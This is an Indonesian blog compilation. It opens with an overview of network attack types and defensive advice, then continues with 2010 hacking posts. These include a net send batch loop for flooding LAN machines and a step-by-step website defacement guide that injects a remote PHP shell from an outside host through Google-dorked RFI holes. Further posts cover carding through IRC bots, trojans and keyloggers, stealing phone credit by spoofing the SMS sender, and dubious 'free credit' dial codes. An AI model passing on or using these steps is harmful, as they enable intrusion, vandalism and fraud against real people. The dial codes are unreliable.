Penyerangan tingkat transport (transport level attack) dilakukan dengan cara mengexploit protokol perute-an/pemetaan e-mail diseluruh internet: Simple Mail Tranport Protocol (SMTP). Seorang attacker dapat mengakibatkan kondisi kesalahan sementara (temporary error) di target system dengan cara mengoverload lebih banyak data pada SMTP buffer sehingga SMTP buffer tidak bisa menanganinya, kejadian ini dapat mengakibatkan seorang attacker terlempar dari sendmail program dan masuk kedalam shell dengan kekuasaan adminitsrasi bahkan dapat mengambil alih root. Beberapa serangan exploitasi juga sering terjadi pada POP dan IMAP.

Pada saat kerawanan SMTP sulit untuk di exploitasi, attacker mungkin saja berpindah ke serangan tranport level jika ia tidak berhasil menyerang dengan cara command manipulation ataupun mail-flood. Serangan ini lebih digunakan untuk membuat gangguan daripada untuk menjebol suatu system. Seorang attacker biasanya akan menggunakan serangan jenis untuk mem flood Exchange Server dan memotong lalu lintas e-mail (trafic e-mail). Serangan ini juga dapat digunakan untuk membuat reputasi suatu organisasi menjadi buruk dengan mengirimkan spam atau offensive e-mail ke organisasi lainnya dengan sumber dan alamat dari organisasi tersebut.

Mail relaying, proses memalsukan asal/source email dengan cara meroutekannya ke arah mesin yang akan dibohongi, adalah type lain dari serangan transport-level. Teknik ini sangat berguna untuk membuat broadcasting spam secara anonymous. Berbagai macam isi(content) yang sering dikirim lewat e-mail. dengan teknik ini biasanya adalah content-content yang merusak. Beberapa Virus dan Worms akan disertakan dalam e-mail sebagai file attachment yang sah, seperti variant Melissa yang nampak sebagai Ms Word Macro atau loveletter worm yang menginfeksi system dan mengemailkan dirinya sendiri ke users yang berada dalam address booknya outlook. Kebanyakan antivirus scanner akan menangkap attachment seperti ini, tetapi visrus dan worm baru serta variannya masih tetap berbahaya.

Serangan yang terakhir yang dilakukan oleh seorang attacker selain serangan diatas adalah dengan cara melakukan social enginering, kadang sang attacker mengirim e-mail dengan source memakai alamat admin agar users mengirimkan passwordnya untuk mengupgrade system.

DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND merupakan target yang paling favorite untuk diserang oleh komunitas cracker karena beberapa kerawanannya. Empat kerawanan terhadap buffer overflow yang terjadi pada bulan Januari lalu hanya beberapa bagian dari kerawanan untuk diexploitasi oleh para cracker agar mendapat akses terhadap system dan melakukan perintah dengan hak penuh (command execution priviledge).

Kerawanan pada BIND merupakan masalah yang sangat serius karena lebih dari 80 persen DNS yang berada di Jagat Internet dibangun menggunakan BIND. Tanpa adanya DNS dalam lingkungan Internet Modern, mungkin transmisi e-mail akan sulit, navigasi ke situs-situs web terasa rumit dan mungkin tidak ada hal mudah lainnya yang menyangkut internet.

Kerawanan BIND bukan hanya terletak pada DNS. System penerjemah alamat (number-address translator) merupakan subject dari kebanyakan exploit, termasuk untuk melakukan penyerangan di tingkat informasi, penyerangan Denial Of Service, pengambil alihan kekuasaan dengan hijacking. Penyerangan di tingkat Informasi bertujuan untuk membuat server menjawab sesuatu yang lain dari jawaban yang benar. Salah satu cara untuk melakukan serangan jenis ini adalah melalui cache poisoning, yang mana akan mengelabui remote name server agar menyimpan jawaban dari third-party domain dengan cara menyediakan berbagai macam informasi kepada domain server yang mempunyai autorisasi. Semua pengimplementasian serangan terhadap DNS akan mempunyai kemungkinan besar untuk berhasil dilakukan jika jawaban dari suatu pertanyaan yang spesisfik bisa dibohongi (spoof).

DOS atau membuat Server tidak dapat beroperasi, bisa dilakukan dengan cara membuat DNS menyerang dirinya sendiri atau juga dengan cara mengirimkan traffic-flooding yang berlebihan dari luar, contohnya menggunakan “Smurf” ICMP flood. Jika suatu organisasi atau perusahaan memasang authoritathive name server dalam satu segment yang terletak dibelakang satu link atau dibelakang satu physical area, maka hal ini akan menyebabkan suatu kemungkinan untuk dilakukannya serangan Denial Of Service.Cracker akan mencoba untuk menyerang system melalui DNS dengan cara buffer overflow, yaitu salah
satu exploit yang sangan berpotensi pada kerawanan BIND. Gangguan exploit terjadi karena adanya kelemahan dalam pengkodean/pemrograman BIND yang mengizinkan seorang attacker untuk memanfaatkan code-code yang dapat dieksekusi untuk masuk kedalam system. Beberapa system operasi telah menyediakan patch untuk stack agar tidak dapat dieksekusi, sebagaimana juga yang dilakukan compiler (menyediakan patch) yang melindungi stack dari overflow. Mekanisme perlindungan ini stidaknya membuat cracker akan sulit menggunakan exploit.

Telah jelas bahwa mengupdate system secara berkala dan menggunakan patch adalah salah satu yang harus dilakukan untuk membangun security yang efektif, jika vendor dari DNS anda tidak menyediakan patch secara berkala, anda lebih baik mengganti software DNS anda yang menyediakan patch secara berkala, tentunya untuk menjaga kemanan system. Pada system Unix , BIND harus dijalankan sebagai root untuk mengatur port yang lebih rendah (kodekode mesin). Jika software DNS dapat dibodohi untuk menjalankan code-code berbahaya, atau membuka file-file milik root, user local mungkin saja bisa menaikan kekuasaannya sendiri didalam mesin. Organisasi atau perusahaan yang mengubah authoritative server juga harus waspada bahwa mengganti server mereka dalam waktu yang bersamaan akan mengakibatkan domain mereka di hijack melalui cache poisoning. Mengubah server seharusnya dilakukan sebagai proses transisi. Untuk mencegah domain hijacking sebaiknya network admin terlebih dahulu menambahkn server barunya kedalam network infrastucture sebelum mengganti server yang lama.

Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing. Penebakan(guessing) password bisa dilakukan dengan cara memasukan password satu persatu secara manual ataupun dengan bantuin script yang telah diprogram. Kebanyakan user menggunakan hal-hal yang umum untuk password mereka diantaranya tanggal lahir, dan biasanya user tidak menghawatirkan tentang aturan yang berlaku pada perusahaan untuk menggunakan kombinasi alphanumeric dan minimal 7 karakter. Jika saja user memakai tanggal lahirnya sebagai password maka hal penyerangan akan sangat mudah dilakukan, karena cracker tidak membutuhkan waktu yang lama hanya untuk menjebol 6 digit angka tanggal lahir. Beberapa user atau bahkan administrator dapat membuat pekerjaan cracker menjadi mudah andai saja mereka lupa untuk merubah password default dari sebuah software.

Sebenarnya, password guessing merupakan sesuatu yang sangat tidak efektif, dan dapat menghabiskan waktu. Network admin bisa dengan mudah mendetect serangan jika seorang attacker mencoba login dengan menebak password berkali-kali. Brute-force merupakan serangan yang menggunakan logika yang sama dengan password guessing tetapi serangan brute-force lebih cepat dan lebih powerfull. Dalam tipe serangan ini seorang attacker menggunakan script (biasanya program cracking gratis) yang akan mencoba password-password umum(biasanya terdapat dalam dictionary). Tujuan dari serangan jenis ini adalah untuk mempercepat penemuan password sebelum network admin menyadari adanya serangan. Walaupun serangan Brute-force lebih efisien daripada password guessing, kedua teknik tersebut pada dasarnya sama. Attacker umumnya lebih sulit untuk berhasil dengan kedua metoda tersebut. Lebih jauh lagi, kedua teknik tersebut sangat mudah di lawan dengan memanfaatkan features blacklisting, yang akan mengunci sebuah account user jika seseorang(attacker) berkali-kali memasukkan password secara tidak tepat. Contohnya, default blacklist dalam system unix adalah tiga kali (kesempatan memasukkan password).

Kelemahan dari perlindungan blacklist adalah bahwa feature blacklist ini dapat igunkan untuk menyerang system oleh attacker. Sebagai contoh, jika seorang attacker dapat mengidentifikasi siapa login name untuk network admin, sang attacker bisa saja menngunakan login name itu dan memasukkan password yang salah berulangkali dan akhirnya mengunci account admin ☺. Ketika sang admin sedang berusaha untuk mendapatkan aksesnya kembali, seorang attacker masih bisa untuk berhubungan dengan system. Password cracking adalah metoda untuk melawan perlindungan password yang dienkripsi yang berada di dalam system. Dengan anggapan bahwa atacker telah masuk kedalam system, ia bisa saja mengubah kekuasaannya didalam system dengan cara meng crack password file menggunakan metode brute-forcedictionary attack (mencocokan kata-kata yang berada dalam kamus dengan kata-kata yang dienkripsi dalam file password). Keberhasilan menggunakan cara ini bergantung pada kecepatan prosesor dan
program yang dimiliki oleh attacker. Cara yang terbaik untuk menghindari serangan jenis ini adalah dengan memonitor kewenangan akses pada file.

Dengan cara mengintip lalulintas pada port telnet(23) ataupun HTTPD (80), seorang attacker dapat mendapatkan password yang digunakan untuk internet dan koneksi secara remote melalui proses yang dinamakan password snifing. Cara inilah yang paling mudah dilakukan karena kedua koneksi tersebut tidak menggunakan enkripsi, kecuali koneksi yang menggunakan SSL (secure socket layer) pada HTTPD(biasanya ada tanda gembok terkunci dibawah browser, yang menandakan transaksi aman) atau juga menggunakan SSH (Secure SHell) untuk koneksi ke mesin lain secara remote.

9. Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam system saya akan bisa juga saya lakukan dalam system anda dan sebaliknya. Jika firewal yang berada dalam trusted network tidak dikonfigurasikan secara optimal, khususnya untuk memblok akses dari luar, apalagi jika autentikasi dan enkripsi tidak digunakan, seorang attacker bias menyerang proxy server dan mendapatkan akses yang sama dengan anggota trusted network lainnya. Jika attaker sudah masuk ke sistem ia tentunya bisa melakukan apa saja dan ia bisa melakukan DDOS(distributed denial of service) secara anoymous untuk menyerang network lain. Router yang tidak dikonfigurasikan secara optimal juga akan berfungsi sebagai proxy server dan akan mengakibatkan kerawanan yang sama dengan proxy server.

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file. Tergantung pada OS (operating system) yang digunakan, attacker bisa meng extrack informasi tentang network, sharing privileges, nama dan lokasi dari user dan groups, dan spesifikasi dari aplikasi atau banner (nama dan versi software). System yang dikonfigurasi atau diamankan secara minimal akan dengan mudah membeberkan informasi ini bahkan melalui firewall sekalipun. Pada system UNIX, informasi ini dibawa oleh NFS (Network File System) di port 2049. system Windows menyediakan data ini pada SMB (server messaging block) dan Netbios pada port 135 - 139(NT) dan port 445 pada win2k.Network administrator bisa meminimalisasi resiko yang akan terjadi dengan menggunakan Protokolprotokol
tersebut dengan memberikan sedikit peraturan. Network dengan system windows, harusnya memblok akses ke port 139 dan 445 dari luar network, jika dimungkinkan. Dalam system unix port 2049 seharusnya di blok, sharing file dibatasi dan permintaan file melalui showmount(perintah dalam unix) seharusnya di catat dalam log.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor. Biasanya antivirus yang dijual dipasaran akan dapat mendeteksi dan membersihkan program-program seperti ini, tetapi jika ada virus baru (anggap saja variant melissa) virus scanner belum tentu dapat menghadapi script-script baru. Beberapa network administrator melakukan pertahan terhadap malware dengan teknologi alternatif seperti behaviour blockers, yang memberhentikan kode-kode yang dicurigai berdasarkan contoh kelakuan malware, bukan berdasarkan signature. Beberapa aplikasi lainnya akan mengkarantina virus dan code-code yang dicurigai didalam daerah yang dilindungi, biasanya disebut sandboxes.

13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14. TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception

TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like. TCP/IP Sequence Stealing adalah pemetaan dari urutan nomor-nomor (angka), yang bisa membuat packet milik attacker terlihat legal. Ketika suatu system meminta sesi terhadap mesin lain, kedua system tersebut saling bertukar nomor-nomor sinkronisasi TCP. Jika tidak dilakukan secara acak, Attacker bisa mengenali algoritma yang digunakan untuk meng –generate nomor-nomor ini. Urutan nomor yang telah dicuri bias digunakan attacker untuk menyamar menjadi salah satu dari system tadi, dan akhirnya memperbolehkannya untuk melewati firewall. Hal ini sebenarnya efektif jika digunakan bersama IP Spoofing.

Melalui passive port listening, seorang attacker dapat memonitor dan mencatat (log) semua pesan dan file yang dikirim ke semua port yang dapat diakses pada target system untuk menemukan titik kerawanan. Packet Interception adalah bagian (tepatnya pelapis) dari active listener program yang berada pada port di system sasaran yang berfungsi untuk menerima ataupun mengembalikan semua tipe pesan (data) spesifik yang dikirim. Pesan tersebut bisa dikembalikan ke unauthorized system, dibaca dan akhir nya dikembalikan lagi baik tanpa perubahan atau juga dengan perubahan kepada attacker, atau bahkan tidak dikembalikan. Dalam beberapa versi atau juga menurut konfigurasi dari user SSHD(secured shell daemon), otentikasi bisa dilakukan dengan cara menggunakan public key (milik mesin tentunya). Jika seorang attacker mempelajari public key yang digunakan, ia bisa menciptakan atau memasukan paket-paket palsu. System sasaran akan menganggap pengirim paket palsu tersebut mempunyai hak akses.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods. HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.
Beberapa feature dari HTTPD bisa digunakan untuk meciptakan HTTPD byapass, memberi akses ke server menggunakan fungsi logging. Dengan cara ini, sebuah halaman web bisa diakses dan diganti tanpa dicatat oleh web server. Cara ini sering digunakan oleh para cracker, hacktivis dan cyber vandals untuk mendeface website. Sedangkan kerawanan pada script-script web bisa terjadi pada semua bahasa pemrograman web dan
semua ekstensi aplikasi. Termasuk VB, Visual C++, ASP, TCL, Perl, PHP, XML, CGI dan Coldfusion. Pada dasarnya, attacker akan mengexploitasi kelemahan dari sebuah aplikasi, seperti CGI script yang tidak memeriksa input atau kerawanan pada IIS RDS pada showcode.asp yang mengizinkan menjalankan perintah secara remote (remote command priviledges). Melalui cross scripting dan cross-site scripting seorang attacker bisa mengexploitasi pertukaran cookies antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll. Script ini bisa menjalankan malware, membaca infomasi penting dan meng expose data sensitive seperti nomor credit card dan password. Pada akhirnya attacker dapat menjalankan denial of service dengan URL flood, yang dilakukan dengan cara mengulang dan terus mengulang permintaan terhadap port 80 httpd yang melalui batas TTL (time to live). Beberapa user ataupun manager mungkin benci mendengar serangan-serangan tersebut. Tapi pada kenyataanya memang tidak ada yang benar-benar fix untuk mengamankan network ataupun website. Keamanan adalah suatu proses, bukan produk. Jika anda memasang firewall, IDSes(instrusion detection system), routers dan honeypots (system untuk jebakan) mungkin dapat menyediakan lapisan-lapisan untuk bertahan, tetapi sekali lagi peralatan paling canggih di dunia tidak akan menolong suatu organisasi sampai organisasi tersebut mempunyai proses untuk mengupgrade system, memakai patch, mengecek security pada system sendiri dan metode lain. Telah banyak perusahaan yang memakai IDSes tetapi tidak memonitor file log, mereka menginstall firewall, tetapi tidak mengupgradenya. Jalan terbaik untuk melindungi website maupun network dari serangan adalah mendekatkan keamanan sebagaimana tantangan yang sedang terjadi terhadap keamanan
itu sendiri, terus berusaha, selalu ingat basicnya dan jangan lupa untuk berdoa...Smile

Sumber : www.IlmuKomputer.Com

Tutorial Melakukan Flooding Jaringan

2010-08-16T23:39:00.000-07:00

Tutorial Melakukan Flooding Jaringan

Mungkin ada yang ingin bertanya, “bagaimana seh caranya flooding ke komputer lain dalam satu network?” dan mungkin akan ada juga pertanyaan “kenapa anda ingin melalukan flooding ke komputer lain dalam 1 network?”.

Nah, alasannya ada beragam. Bisa karena kesal dengan calon korban, bisa karena sekedar iseng, bisa karena ingin nambah ilmu aja, ato alasan apa aja. Tapi untuk jawaban yang pertama, akan saya beri sedikit turorial berupa scriptnya.

OK..!!! ikuti langkah2 berikut ini :

1. Run command prompt/cmd anda, caranya klik start > run > cmd
2. Saat command prompt anda muncul, ketik edit hi.bat
3. Maka tampilan command prompt anda akan berbeda. setelah itu masukkan/ketikkan code di bawah ini :

net send [ipkomputer]/[namakomputer] hi
call hi.bat

kemudian save as file tersebut.

Saat ingin melakukan flooding, tingal klik 2 kali file batch tersebut…

Ket :

* hi.bat bisa pada langkah 2 bisa diganti dangan nama apa saja, asal tidak spasi dan harus berekstensi .bat dan jangan lupa juga mengganti hi.bat pada code dengan nama yang sama pada langkah 2.
* jika ga tau nama komputer yang terhubung di jaringan, run cmd, lalu ketik “net view” (tanpa tanda petik2) dan juga saat dimasukkan tanpa tanda [ dan ]. Ingat juga, pilih antara ip ato nama komputer.
* cara ini hanya bisa dilakukan jika service messenger pada windows anda dan komputer tujuan di aktifkan
* yang terakhir..!!!! flooding ini akan mengirim pesan “hi” (bisa diganti) berulang-ulang hingga komputer tujuan hang. jadi gunakan dengan bijak.

original post by mircku

CARA DEFACE

2010-08-16T23:36:00.000-07:00

CARA DEFACE

Ini ada tutorial Cara deface yg nyaman:

1. Buka www.milw0rm.com
2. klik Search
3. ketik RFI (Remote File Inclusion)
4. Cari Exploit terbaru atau CMS/Aplikasi yang terkenal
5. Buka Google, dan liat Advisor yang kita pilih tersebut
6. * Jika terdapat DORK[kata kunci google] gunakan lah Dork tersebut, * Jika tidak gunakanlah Judul dari Exploit tersebut
7. Setelah dapat hasil dari Google, klik kanan Open NewTab[Nah ini untung nya Pake Firefox, tapi IE versi terbaru sudah bisa Open NewTAB]
8. Buka terus dari List/Daftar2 yang terdapat dari google, hingga kamu rasa penuh Browsernya
9. Coba satu persatu dari hasil tersebut dengan Exploit Command yang terdapat di advisor
10. Jika terjadi pesan error, cari Pesan error yang menyatakan kegagalan File Inclusion, bukan File Not Found.
11. Jika menemukan File Not Found kemungkinan; salah Relative Path dari Site tersebut, atau memang beda versi, dan kemungkinan lain
12. Jika menemukan pesan error dari File Inclusion, atau Blank Putih tanpa Pesan Error,
13. Ganti command exploit setelah tanda '='[sama dengan] dengan http://bugs.byethost32.com/php3.txt? [phpshell yang OL/Aktif]
14. Lihat ke Layar, apakah site tersebut berhasil mengeksekusi dan menampilakan PHPShell r57shell atau hanya Blank Page, dan muncul kembali File Inclusion
15. Jika site berhasil memunculkan r57shell [phpshell] lanjutkan ke pencarian File dan Direktory yang memilikik full akses atau -rwxrwxrwx / -rw-rw-rw <-- untuk file | drwxrwxrwx / drw-rw-rw <-- untuk direktory
16. Jika telah mendapatkan file atau direktory diatas tersebut, kamu bisa mengupload file index.html versi buatan kamu, atau mengubah index.php or .html dengan versi code kamu jgn lupa nama manadocoding dikibarkan disana...
17. Setelah merubah file tersebut. Coba kamu lihat di browser sesuai dengan relatife path yang kamu ubah tadi
Original post by ping_win and mircku (lg males ngetik)

Semoga membantu,

Trik hack wartel

2010-08-16T23:34:00.002-07:00

Trick nelp. Gratis. Sebaiknya pkai Wartel B.. Caranya.. Dial nmr tujuan. Contoh.. 0225951122 dan Stl puas nelpon. Sblm nutup telp. Ketik nmr tujuan sekali lagi. 0225951122 dan jngn pkai radial. Ketik nmr tjuan lagi. Stl itu ketik nmr telp. Lain spt 0225952233 Stl itu tutup telepon

Sedot pulsa via web

2010-08-16T23:34:00.001-07:00

Caranya adalah km buka situs yg menyediakan Bulk sms gratis. klo bsa yg provider nya lokal. Stl itu klo utk indosat, pada kolom sender ketik nmr hp org yg akan kmu sedot pulsanya. Di kolom recipient ketik 151. Di kolom message ketik TP spasi NMRHP KM spasi JMLAH PULSA dan kirim.. Klo nmr hp target ada pulsanya, pasti kesedot.
Klo utk XL. di klm sender ketik nmr hp org yg akan disedot pulsanya. Di kolom recipient ketik 168 dan di kolom message ketik BAGI spasi NMR HP KM spasi JMLAH PULSA dan kirim..
Bulk sms jga bsa utk order I RING gratis atau ikut Quiz gratis.. Cuma byr tarif indernet.

Main Playstation via TV non multi

2010-08-16T23:29:00.002-07:00

Caranya..
Kmu harus punya VCD Player yg remote nya ada tombol POWER atau ON/OFF. Sambungkan kabel RF dari vcd player ke lubang utk antena yg ada di tv. Kemudian sambungkan kabel playstation ke lubang VIDEO OUT utk videonya dan AUDIO OUT. yg L atau R utk audio nya. yg ada di vcd player. Kemudian nyalakan TV, PS dan VCD playernya. Cari sinyal vcdnya di channel VHF. stl ketemu, matikan vcd player dg cara tekan tombol POWER atau ON/OFF yg ada di remote bkn di playernya. Dan PS siap digunakan..

Trik Carding

2010-08-16T23:29:00.001-07:00

Kmu masuk ke MIRC dan join ke #CCPOSTS.. di dalnet. stl itu ketik ! COMMAND dan muncul perintah2 yg dpt kmu gunakan.
!CHK CC NUMBER VALID/CHK 1234567890 1202 Utk mengetahui kartu bsa dgunakan atau tdk. !CVV2 CC NUMBER/CVV2 1234567890 Utk mengetahui nmr identitas kartu.
!PROXY Utk mengetahui proxy dan port yg bsa dipakai mengelabui ISP. !ORDER.LOG Utk mengetahui nama alamat dan nmr kartu seseorang.

Utk mendapatkan krtu kredit, kmu bsa pkai paket SNIFFES. Incar web yg system keamanan nya buruk. Kirim kan spyware spt TROJAN atau WORM via email atau apa saja. utk key logger. Prog. Ini akan mencatat aktifitas komputer target ke dlm sebuah file dan mengirimkan nya ke email kmu..

Trik Isi pulsa gratis

2010-08-16T23:26:00.000-07:00

Trick Isi Pulsa GRATIS... Kata org2 caranya adalah...
TELKOMSEL caranya.. Ketik *133*451667491*nmrhp*jmlahplsa#35
MENTARI caranya.. Ketik *556*jmlahplsa*970042157845#35
IM3 caranya.. Ketik *7643*100*78572472847#35 dan tkan tmbl O.K atau CALL.. Tp tdk semua kartu bisa.